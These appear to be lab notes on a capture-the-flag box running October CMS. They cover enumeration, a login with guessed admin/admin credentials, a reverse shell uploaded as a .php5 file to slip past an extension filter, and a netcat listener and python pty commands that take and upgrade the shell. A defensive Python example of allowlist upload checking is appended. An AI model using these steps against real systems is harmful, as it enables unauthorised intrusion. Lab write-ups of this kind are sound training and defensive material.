October - FH: File Upload

# ENUMERATION
NMAP:
- 22: OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8
- 80: Apache httpd 2.4.7
=========================================================
# ENUMERATION
# WEBSITE
October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework.
Welcome to the vanilla theme for OctoberCMS!
- is running October CMS, with the Vanilla theme
# ENUMERATION
# GOBUSTER
/Blog (Status: 200) [Size: 4255]
/account (Status: 200) [Size: 5089]
/backend (Status: 302) [Size: 400]
/blog (Status: 200) [Size: 4255]
/config (Status: 301) [Size: 310]
/error (Status: 200) [Size: 3342]
/forgot-password (Status: 200) [Size: 3837]
/forum (Status: 200) [Size: 9590]
=========================================================
# ENUMERATION
# ENTRY INTO WEBSITE
GUESSED: admin / admin
- was able to enter the website with the guessed credentials.
- must not be true admin... the users tab is forbidden.
- FAIL: uploading a php reverse shell failed (no explanation)
- PASS: a .php5 file uploaded
=========================================================
# REVERSE SHELL
# CLICK ON UPLOADED PHP5 FILE
kali@kali:~$ nc -nvlp 1337
listening on [any] 1337 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.16] 33990
Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux
 05:51:22 up 37 min, 0 users, load average: 8.70, 9.07, 8.85
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ uname -a
Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux
=========================================================
# CONTROL ENVIRONMENT
- I converted the shell to a bash shell with tty
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@october:/home/harry$ ls
ls
october-1.0.412.tar.gz user.txt
=========================================================
# FOOTHOLD - UPLOAD FILE
The foothold is complete, so I will save the privilege escalation for another time.
=========================================================
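
The upload result recorded under ENTRY INTO WEBSITE (a .php file refused, a .php5 file accepted) is consistent with an extension blocklist that is missing an entry. The Python sketch below is an added example, not code from these notes or from October CMS: it contrasts that kind of blocklist check with an allowlist and flags already-stored files the allowlist would have refused. Both extension lists and the sample file names are constructed assumptions.

```python
import os

# Assumption: a blocklist that reproduces the behaviour in the notes
# (.php rejected, .php5 accepted). Constructed; not October CMS's real list.
BLOCKED_EXTENSIONS = {"php", "exe", "sh"}

# Assumption: the only extensions this upload feature actually needs.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}


def extension(filename: str) -> str:
    """Return the final extension, lower-cased, without the leading dot."""
    base = os.path.basename(filename.replace("\\", "/"))
    return os.path.splitext(base)[1].lstrip(".").lower()


def blocklist_accepts(filename: str) -> bool:
    """Weak check: accept anything whose extension is not explicitly blocked."""
    return extension(filename) not in BLOCKED_EXTENSIONS


def allowlist_accepts(filename: str) -> bool:
    """Hardened check: accept only extensions that are explicitly allowed.

    Names with no extension yield "" and are refused as well.
    """
    return extension(filename) in ALLOWED_EXTENSIONS


def audit(filenames):
    """Return stored names a blocklist let through that the allowlist refuses."""
    return [n for n in filenames
            if blocklist_accepts(n) and not allowlist_accepts(n)]


# Constructed listing of an upload directory, for illustration only.
SAMPLE_UPLOADS = ["logo.png", "report.pdf", "shell.php5", "notes.txt", "avatar.JPG"]

if __name__ == "__main__":
    for name in SAMPLE_UPLOADS:
        print(f"{name:12} blocklist={blocklist_accepts(name)!s:5} "
              f"allowlist={allowlist_accepts(name)}")
    print("needs review:", audit(SAMPLE_UPLOADS))
```

The extension check is only one layer: uploads should also be stored where the web server does not hand them to the PHP interpreter.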